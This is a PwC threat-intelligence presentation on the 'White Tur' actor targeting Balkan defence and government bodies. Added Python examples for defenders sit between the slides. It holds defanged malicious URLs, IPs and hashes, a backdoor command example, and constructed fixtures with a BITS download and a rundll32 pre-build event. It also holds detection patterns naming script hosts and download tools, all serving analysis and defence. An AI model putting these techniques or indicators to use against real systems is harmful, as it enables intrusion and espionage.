
Threat actor of in-Tur-est:
Unveiling Balkan targeting
January 2022
Introduction

Jack Simpson, Principal Analyst, PwC (@linkcabin)
Been in the team for 4 years focusing on the EURO region (technical)
• West Ham fan (soccer)
• Nearly cried watching the EURO finals
• Big fan of Goose Island IPAs
• Technical side of this White Tur talk

Louise Taggart, Senior TI Manager, PwC (@loutagtech)
Been in the team for 6.5 years focusing on the EURO region (strategic)
• Middlesbrough fan (soccer)
• Foreign language nerd (E Europe & Balkans)
• Proponent of Georgian food
• I’ll be covering the geographic context of White Tur

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE


Where it began

We observed the domain qov[.]rs being registered on 29th January 2021.
When later visiting the page, an HTTrack comment was in the HTML code, showing its capture date, 31st January 2021.
Once the domain was reported on publicly by a security researcher on Twitter, it stopped resolving within a few hours.
The phishing page was online for two weeks.
We attributed this activity to a new threat actor name, ‘White Tur’.
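The HTTrack check described on this slide, written out as an added Python example (it is not part of the PwC deck): it looks for the mirror comment that HTTrack leaves at the top of a cloned page, reads the capture timestamp from it and compares that with the phishing domain's registration date. The comment wording is assumed from typical HTTrack output, and the sample page, site name and timestamp are constructed to mirror the timeline above (registered 29 January, captured 31 January); the real qov[.]rs page is not reproduced.

```python
import re
from datetime import date
from email.utils import parsedate_to_datetime

# Comment HTTrack leaves in mirrored pages. The exact wording is assumed from typical
# HTTrack output; the match relies only on the "Mirrored from <site> by HTTrack Website
# Copier/<version>[...], <RFC 2822 date>" shape.
HTTRACK_RE = re.compile(
    r"<!--\s*Mirrored from\s+(?P<source>\S+)\s+by HTTrack Website Copier/"
    r"(?P<version>[\w.]+)(?:\s*\[[^\]]*\])?,\s*(?P<date>[^>]+?)\s*-->",
    re.IGNORECASE,
)


def find_httrack_comment(html: str):
    """Return (source site, HTTrack version, capture datetime) or None when no mirror comment exists."""
    m = HTTRACK_RE.search(html)
    if not m:
        return None
    try:
        captured = parsedate_to_datetime(m.group("date"))
    except (TypeError, ValueError):
        captured = None
    return m.group("source"), m.group("version"), captured


def triage_phishing_page(html: str, registered_on: date) -> dict:
    """Combine the HTTrack evidence with the domain's registration date: a mirror taken a day or
    two after registration is the 'clone a legitimate site, then host it' pattern."""
    found = find_httrack_comment(html)
    if not found:
        return {"mirrored": False}
    source, version, captured = found
    result = {
        "mirrored": True,
        "source": source,
        "httrack_version": version,
        "captured": captured.date().isoformat() if captured else None,
    }
    if captured:
        result["days_after_registration"] = (captured.date() - registered_on).days
    return result


# Constructed sample: site name and timestamp are made up to follow the slide's timeline.
REGISTERED_ON = date(2021, 1, 29)
SAMPLE_HTML = """<!DOCTYPE html>
<!-- Mirrored from cloned-site.example/login/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 31 Jan 2021 09:15:02 GMT -->
<html><head><title>Sign in</title></head><body><form method="post">...</form></body></html>
"""

if __name__ == "__main__":
    print(triage_phishing_page(SAMPLE_HTML, REGISTERED_ON))
```

The registration date comes from WHOIS or passive DNS, not from the page itself; the value of the check is the gap between the two dates, since a clone made within days of registration rules out a long-running legitimate mirror.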



White Tur clustered infrastructure

• After pivoting from IP resolutions based on qov[.]rs we identified additional infrastructure.
• Additional domains were observed showing interest in Serbia and Republika Srpska due to the domains masquerading as organisations in these regions.

Malicious Domain | Legitimate Domain | Description
sajam[.]us       | sajam[.]rs        | Exhibition centre in Serbia, which has hosted defence fairs
mtel[.]ac        | mtel[.]ba         | Telecommunications company based in the region
vladars[.]co     | vladars[.]net     | Republika Srpska government domain
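The masquerading pattern in the table (same organisation label under a different TLD, or a one-character swap such as qov for gov) is the kind of thing a brand-monitoring check can catch from newly registered domain feeds. The Python below is an added example, not PwC tooling: it flags observed domains that reuse a watched label under another suffix or sit within one edit of a watched label. The watch list is the three legitimate domains from the table plus gov.rs, which is an assumption here (the slides do not name the domain qov[.]rs imitates), and the suffix handling is deliberately naive (last label only, no Public Suffix List).

```python
def refang(ioc: str) -> str:
    """Undo the defanging used in the slides (qov[.]rs -> qov.rs) and normalise case."""
    return ioc.replace("[.]", ".").lower().strip(".")


def split_domain(domain: str):
    """Split into (registrable label, suffix). Simplification: the suffix is the last label only,
    so multi-part suffixes such as co.uk are not handled; a real tool would use the Public Suffix List."""
    labels = refang(domain).split(".")
    if len(labels) < 2:
        raise ValueError(f"not a dotted domain: {domain}")
    return labels[-2], labels[-1]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character substitutions such as q for g."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(observed, watchlist, max_distance=1):
    """Return (observed, imitated, reason) for every observed domain that reuses a watched
    label under a different suffix, or whose label is within max_distance edits of a watched one."""
    hits = []
    for dom in observed:
        label, suffix = split_domain(dom)
        for legit in watchlist:
            wlabel, wsuffix = split_domain(legit)
            if label == wlabel and suffix != wsuffix:
                hits.append((refang(dom), refang(legit), "same label, different TLD"))
            elif label != wlabel and edit_distance(label, wlabel) <= max_distance:
                hits.append((refang(dom), refang(legit), "near-miss label"))
    return hits


# Watch list: legitimate domains from the table plus gov.rs (an assumption, see lead-in).
WATCHLIST = ["sajam.rs", "mtel.ba", "vladars.net", "gov.rs"]
# Observed: the malicious domains from the slides plus one unrelated domain as a control.
OBSERVED = ["qov[.]rs", "sajam[.]us", "mtel[.]ac", "vladars[.]co", "example[.]rs"]

if __name__ == "__main__":
    for obs, legit, why in find_lookalikes(OBSERVED, WATCHLIST):
        print(f"{obs:14} imitates {legit:12} ({why})")
```

Run against a certificate-transparency or zone-file feed, the "same label, different TLD" rule is the cheap one; the edit-distance rule needs a short watch list or it produces noise on common words.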



Vladars targeting
• Ministry of Interior for Republika Srpska alerting on phishing activity in 2020 with the email set as kabinet@vladars[.]co
• We observed a file on the vladars[.]co domain on 23rd April 2020:
  hxxps[:]//vladars[.]co/download.php?act=dl&id=5611



Vladars targeting
hxxps[:]//mup[.]vladars[.]net/index.php?vijest=vtk&id=23325&vrsta=aktuelnosti

We later observed the URL hxxps[:]//webmail[.]vladars[.]net/owa/redir.aspx?C=wOEXQr_r5qV1iK20XXYj8jKY-nbtiVCs2Xz79nmeO2zJWyamjOfXCA..&URL=hxxps[:]//vladars[.]co/download.php?act=dl&id=5611, showing an outbound link to the malicious domain vladars[.]co.



Vladars targeting

Infrastructure diagram nodes: vladars[.]co, 94.156.189[.]122, dropbox-online[.]pro

• The malicious HTA file attempts to download code from dropbox-online[.]pro
• HTA window background colour set to #3961a2, which was used to pivot to additional samples
• The two domains vladars[.]co and dropbox-online[.]pro are linked via IP resolutions



Common handles

tensho, shadz, atarox, programming

Observed across: infrastructure, weaponised documents, malware



Threat actor themes

• Research and development
• Military and weapons suppliers
• Government
• Metal processing factory
• Ammunition identification technology
• Ammunition factory
• Telecommunications and internet provider



Defence and government targeting

• CVs and annual defence reports used as lures for weaponised documents and archives
• Threat actor uses recent internal documents with malicious campaigns within days (1-6 days)
• Threat actor compromised a website which had open directory listings available

Document lure used by threat actor



PowerShell scripts
• Uses WMI objects and BitsTransfer service extensively with PowerShell scripts

• Often used in HTA script infection chain

Stage 1 PowerShell

PowerShell LNK Dropper


JScript backdoor
Infection chain: Loader (Weaponised Document → XSL file / LNK file → JScript) → Payload (JScript)

• JScript (not JavaScript!) is one of the interpreted languages used in Windows Script Host (wscript.exe)
• Use of RC4 to decrypt the payload, evading static analysis
• XSL scripts are the most popular choice by White Tur to execute the JScript payload from a weaponised document
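Why RC4 defeats string-based static scanning, and what the analyst does about it, as an added Python example (not code from the deck or from the malware): a textbook RC4 routine is used once to produce a ciphertext from a constructed JScript-like stand-in, the indicative strings are shown to be absent from the ciphertext, and decryption with the recovered key brings them back. The payload text and the key are invented; in a real case the key is read out of the loader script, which must carry it in the clear for the interpreter to use.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Constructed stand-in for a JScript payload; the real backdoor's code is not reproduced.
SAMPLE_PAYLOAD = b'var sh = new ActiveXObject("WScript.Shell");\nsh.Run("cmd.exe /C whoami");\n'
# Hypothetical key; in practice it is recovered from the loader, which must hold it in the clear.
SAMPLE_KEY = b"example-key"

# Strings a static scanner or YARA rule would normally key on.
INDICATIVE_STRINGS = (b"WScript.Shell", b"ActiveXObject", b".Run(")


def build_encrypted_sample() -> bytes:
    """What the loader would embed: the payload under RC4 with SAMPLE_KEY."""
    return rc4(SAMPLE_KEY, SAMPLE_PAYLOAD)


def static_string_hits(blob: bytes) -> list:
    """Indicative strings visible in a blob without any decoding."""
    return [s.decode() for s in INDICATIVE_STRINGS if s in blob]


def recover_payload(blob: bytes, key: bytes):
    """Decrypt with the recovered key and report which indicative strings are now visible."""
    plain = rc4(key, blob)
    return plain, static_string_hits(plain)


if __name__ == "__main__":
    blob = build_encrypted_sample()
    print("hits before decryption:", static_string_hits(blob))
    plain, hits = recover_payload(blob, SAMPLE_KEY)
    print("hits after decryption: ", hits)
```

For detection this argues for keying on the loader rather than the payload: the XSL or LNK stage still has to contain the RC4 routine and the key in plain text, and a Script Block Logging or AMSI view sees the decrypted script at execution time.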



Binary analysis
• Early backdoor samples contain only three commands:
  – EX (Execute command)
  – SL (Sleep)
  – BY (Default response)

Initial check in

Example command:
C:\Windows\System32\cmd.exe /C whoami > C:\Users\<user>\AppData\Local\Temp\{6279BFE5-918F-4821-9CA8-3DAD11ADCF5B}
Command results call back
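Two detection rules drawn from the "PowerShell scripts" slide and the "Binary analysis" slide, written as one added Python example (not PwC detection content): a cmd.exe command line that redirects output into a GUID-named file under the user's Temp folder (the shape of the EX command example), PowerShell spawned by a script host such as mshta.exe, and script blocks that use BITS transfer or WMI. The event schema is a simplified Sysmon-like dict and all events are constructed; the user name, paths, parent process names and URL are made up, and the GUID is the one from the slide.

```python
import re

# Rule 1: cmd.exe output redirected into a GUID-named file under %LocalAppData%\Temp.
GUID_TEMP_REDIRECT = re.compile(
    r'>\s*"?[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\'
    r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"?\s*$'
)
# Rule 2: BITS transfer and WMI usage inside PowerShell script blocks.
BITS_OR_WMI = re.compile(
    r"Start-BitsTransfer|Import-Module\s+BitsTransfer|Get-WmiObject|Invoke-WmiMethod|Win32_Process",
    re.IGNORECASE,
)
# Rule 3: PowerShell launched by a script host (the HTA -> PowerShell chain).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def evaluate(event: dict) -> list:
    """Return the findings that fire for one event (schema as in SAMPLE_EVENTS, constructed)."""
    findings = []
    if event["type"] == "process":
        image = event["image"].lower()
        parent = event.get("parent", "").lower()
        if image.endswith("cmd.exe") and GUID_TEMP_REDIRECT.search(event["cmdline"]):
            findings.append("cmd output redirected to GUID-named %Temp% file")
        if image.endswith("powershell.exe") and parent in SCRIPT_HOSTS:
            findings.append("PowerShell spawned by script host")
    elif event["type"] == "scriptblock":
        if BITS_OR_WMI.search(event["text"]):
            findings.append("PowerShell script uses BITS transfer / WMI")
    return findings


def scan(events) -> list:
    """(event id, finding) pairs over a batch of events."""
    return [(e["id"], f) for e in events for f in evaluate(e)]


# Constructed events; everything except the GUID from the slide is made up.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": "update.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe /C whoami > C:\Users\alice\AppData\Local\Temp\{6279BFE5-918F-4821-9CA8-3DAD11ADCF5B}"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "mshta.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\alice\AppData\Local\Temp\stage1.ps1"},
    {"id": 3, "type": "scriptblock",
     "text": "Import-Module BitsTransfer; Start-BitsTransfer -Source https://files.example/u.bin -Destination $env:TEMP\\u.bin"},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": "explorer.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe /C dir > C:\Users\alice\Documents\listing.txt"},
    {"id": 5, "type": "scriptblock", "text": "Get-ChildItem $env:TEMP | Sort-Object LastWriteTime"},
]

if __name__ == "__main__":
    for event_id, finding in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {finding}")
```

Rule 1 is the most specific of the three and is worth keeping tight; rules 2 and 3 will fire on administrative scripts in some environments, so they are better treated as enrichment that raises the score of a host already showing rule 1 or an HTA execution.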
OpenHardware Monitor backdoor
• Threat actor used pre-build events in Visual Studio to execute a backdoor.
• The technique was previously used by ZINC/Lazarus (which we track as Black Artemis), an unrelated threat actor, at the start of 2021, as reported by Microsoft.
• Pre-build event code is found in OpenHardwareMonitorLib.csproj
• Execution of the malware named WOFUTIL.dll or command.dat
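Because a pre-build event is just a command line stored in the project file, a trojanised project can be screened before anyone opens it in Visual Studio. The Python below is an added example, not PwC tooling: it parses a .csproj, collects every PreBuildEvent/PostBuildEvent property and every SDK-style Exec task, and flags commands that invoke script hosts, DLL loaders or download utilities. The sample project is constructed; it borrows the csproj name and the WOFUTIL.dll file name from the slide, but the rundll32 command, its export name and the other events are made up.

```python
import re
import xml.etree.ElementTree as ET

# Tokens that rarely belong in the build events of a hardware-monitoring library.
SUSPICIOUS = re.compile(
    r"rundll32|regsvr32|mshta|wscript|cscript|powershell|certutil|bitsadmin|\.dat\b|https?://",
    re.IGNORECASE,
)


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def build_event_commands(csproj_xml: str):
    """Yield (where, command) for old-style <PreBuildEvent>/<PostBuildEvent> properties and for
    SDK-style <Target><Exec Command="..."/></Target> tasks."""
    root = ET.fromstring(csproj_xml)
    for el in root.iter():
        name = _local(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent"):
            if el.text and el.text.strip():
                yield name, el.text.strip()
        elif name == "Target":
            tname = el.get("Name", "?")
            for task in el.iter():
                if _local(task.tag) == "Exec" and task.get("Command"):
                    yield f"Target {tname}/Exec", task.get("Command")


def audit_project(csproj_xml: str) -> list:
    """One dict per build command, flagged when it matches SUSPICIOUS."""
    findings = []
    for where, cmd in build_event_commands(csproj_xml):
        hit = SUSPICIOUS.search(cmd)
        findings.append({
            "where": where,
            "command": cmd,
            "suspicious": hit is not None,
            "matched": hit.group(0).lower() if hit else None,
        })
    return findings


# Constructed project file: the pre-build command and export name are invented for the example.
SAMPLE_CSPROJ = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <AssemblyName>OpenHardwareMonitorLib</AssemblyName>
    <PreBuildEvent>rundll32.exe "$(ProjectDir)Resources\WOFUTIL.dll",Start</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)Bin\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Restore" BeforeTargets="PreBuildEvent">
    <Exec Command="dotnet tool restore" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for f in audit_project(SAMPLE_CSPROJ):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['where']}: {f['command']}")
```

The same walk applies to .vbproj and .vcxproj files and to Directory.Build.props, which MSBuild imports automatically; a repository policy that diffs build events on every pull request catches the insertion at review time rather than at build time.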



Crime links

• command.dat is a signed file; the digital signature name is STA-R TOV.
• Uses common White Tur handle: C:\Users\tensho\Desktop\StormKitty-master\Cameleon\Release\Cameleon.pdb
• Digital signature is shared with a number of other malware families connected from our analysis to different threat actors such as White Magician (a.k.a. Trickbot).
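The handle pivot on this slide comes from the PDB path compiled into the binary. As an added Python example (not PwC code), the routine below scans raw file bytes for CodeView "RSDS" debug records, extracts the PDB path from each and pulls out the Windows account name, which is the pivot key that links samples across campaigns. The sample image is constructed: the GUID and age are made up, the path is the one reported on the slide, and no real binary is embedded.

```python
import re
import struct
import uuid

# CodeView "RSDS" debug record: magic, 16-byte GUID (little-endian field order), 4-byte age,
# NUL-terminated PDB path.
RSDS_MAGIC = b"RSDS"
USER_DIR = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.IGNORECASE)


def extract_pdb_records(blob: bytes) -> list:
    """Return (guid, age, path) for each RSDS record found by scanning the raw bytes.
    Scanning instead of walking the PE debug directory keeps this usable on truncated files."""
    records = []
    start = 0
    while True:
        idx = blob.find(RSDS_MAGIC, start)
        if idx < 0 or idx + 24 > len(blob):
            break
        guid = uuid.UUID(bytes_le=blob[idx + 4:idx + 20])
        age = struct.unpack_from("<I", blob, idx + 20)[0]
        end = blob.find(b"\x00", idx + 24)
        if end > idx + 24:
            path = blob[idx + 24:end].decode("ascii", "replace")
            records.append((str(guid), age, path))
        start = idx + 4
    return records


def handles_from_paths(paths) -> list:
    """Account names from C:\\Users\\<name>\\... PDB paths, the reusable pivot key."""
    names = set()
    for p in paths:
        m = USER_DIR.match(p)
        if m:
            names.add(m.group(1))
    return sorted(names)


def build_sample_image() -> bytes:
    """Constructed bytes standing in for a file's debug data: GUID and age are made up,
    the path is the one reported on the slide."""
    path = rb"C:\Users\tensho\Desktop\StormKitty-master\Cameleon\Release\Cameleon.pdb"
    guid = uuid.UUID("12345678-1234-5678-1234-567812345678")
    return b"\x00" * 16 + RSDS_MAGIC + guid.bytes_le + struct.pack("<I", 1) + path + b"\x00" * 8


if __name__ == "__main__":
    recs = extract_pdb_records(build_sample_image())
    for guid, age, path in recs:
        print(f"{guid} age={age} {path}")
    print("handles:", handles_from_paths([r[2] for r in recs]))
```

The path string alone is a weak link between samples, since build paths are easy to change; the slide's pairing of the PDB handle with a shared code-signing identity is what makes the pivot hold.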



Crime links

                             | White Tur CV sample                                     | Suspected crime sample
Author metadata              | hxxp[:]//149.255.35[.]96/snow.xml                       | hxxp[:]//149.255.35[.]96/snow.xml
Loader URL                   | hxxp[:]//193.37.212[.]54/load_js.php?id=212209074875547 | hxxp[:]//safe-redirect[.]pw/load_js.php?id=664548
Submission country of origin | RS                                                      | US, JP
Number of files              | 1                                                       | 4
Hosted                       | N/A                                                     | hxxp[:]//buisnessinfobilling[.]com



Other links

Unrelated threat actors registering old White Tur domains



Attribution = difficult!

“Establishing attribution for cyber operations is difficult but not impossible”
US Office of the Director of National Intelligence



Context of targeting:
Serbia and Republika Srpska



Defence sector

Serbia:
Serbia is the largest regional military spender
Serbian defence industry is dominated by state-owned enterprises

Republika Srpska:
Dayton Peace Agreement led to significant reforms for Republika Srpska (RS)
Single state-level central command



Vested interests: Bosnia-Herzegovina

Growing support in RS for withdrawal from state-level institutions

Tensions between constituent federal entities



Vested interests: Kosovo
Unilateral declaration of independence in 2008

NATO peacekeeping mission remains in place

Cross-border tensions result in deployments at crossing points in 2021



Vested interests: Russia

Significant cultural ties with Balkans region
Close ally of Serbia, including supplying military hardware
Mutual support on areas including international recognition



Vested interests: China

Serbia has sought to position itself as a strategic hub for China
Serbia has provided a foothold in the European defence market



Vested interests: The West

Member of NATO’s Partnership for Peace programme
EU is key trading partner for Serbia
Bosnia’s EU progress is hampered by complex constitutional structure



Next steps with tracking White Tur



Question time!

More information on:
PwC Cyber Threat Intelligence
Check out our blog on White Tur
Sign up for our 2021 Year in Retrospect report
https://pwc.to/3qEdvsN



Appendix A: Indicators of Compromise

Archive containing HTA script:
6eddc8757fc921dfd7a627b4c5d638c3eb18b83964fa85dc7aa3187b155bda73
vladars[.]co
dropbox-online[.]pro
94.156.189[.]122

Weaponized CV sample:
4eee7e165c6f4725781be0f249048a43a78ac039f576dd6b30498c15fb144567
microsoft[.]update-store[.]com
185.203.118[.]2

XSL script with JScript backdoor:
d69561ad67f7387e6460a81111878b7bc727cbe6100b952ba5eed38694952e4b
149.255.35[.]96
adobe-documents[.]com



Appendix A: Indicators of Compromise

Domains:
qov[.]rs
sajam[.]us
mtel[.]ac
vladars[.]co
dropbox-online[.]pro
onedrive-login[.]net
onedrive-login[.]us

URLs:
hxxp[:]//149.255.35[.]96/snow.xml
hxxp[:]//safe-redirect[.]pw/load_js.php?id=664548
hxxp[:]//193.37.212[.]54/load_js.php?id=212209074875547
hxxp[:]//buisnessinfobilling[.]com



Appendix B: MITRE ATT&CK
Command and Scripting Interpreter: PowerShell - https://attack.mitre.org/techniques/T1059/001/

User Execution: Malicious File - https://attack.mitre.org/techniques/T1204/002/

Exfiltration Over Command and Control Channel - https://attack.mitre.org/techniques/T1041/

Command and Scripting Interpreter: Visual Basic - https://attack.mitre.org/techniques/T1059/005/

Command and Scripting Interpreter: Windows Command Shell - https://attack.mitre.org/techniques/T1059/003/

Bits Jobs - https://attack.mitre.org/techniques/T1197/

Deobfuscate/Decode Files or Information - https://attack.mitre.org/techniques/T1140/

XSL Script Processing - https://attack.mitre.org/techniques/T1220/

Template Injection - https://attack.mitre.org/techniques/T1221/

File and Directory Discovery - https://attack.mitre.org/techniques/T1082

Software Discovery: Security Software Discovery - https://attack.mitre.org/techniques/T1518/001/

System Information Discovery - https://attack.mitre.org/techniques/T1082/



Thank you

pwc.com

This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this publication without obtaining
specific professional advice. No representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law,
PricewaterhouseCoopers LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else acting, or refraining to act, in
reliance on the information contained in this publication or for any decision based on it.

© 2022 PwC. All rights reserved. Not for further distribution without the permission of PwC. “PwC” refers to the network of member firms of PricewaterhouseCoopers International Limited (PwCIL), or, as the context
requires, individual member firms of the PwC network. Each member firm is a separate legal entity and does not act as agent of PwCIL or any other member firm. PwCIL does not provide any services to clients.
PwCIL is not responsible or liable for the acts or omissions of any of its member firms nor can it control the exercise of their professional judgment or bind them in any way. No member firm is responsible or liable for
the acts or omissions of any other member firm nor can it control the exercise of another member firm’s professional judgment or bind another member firm or PwCIL in any way.
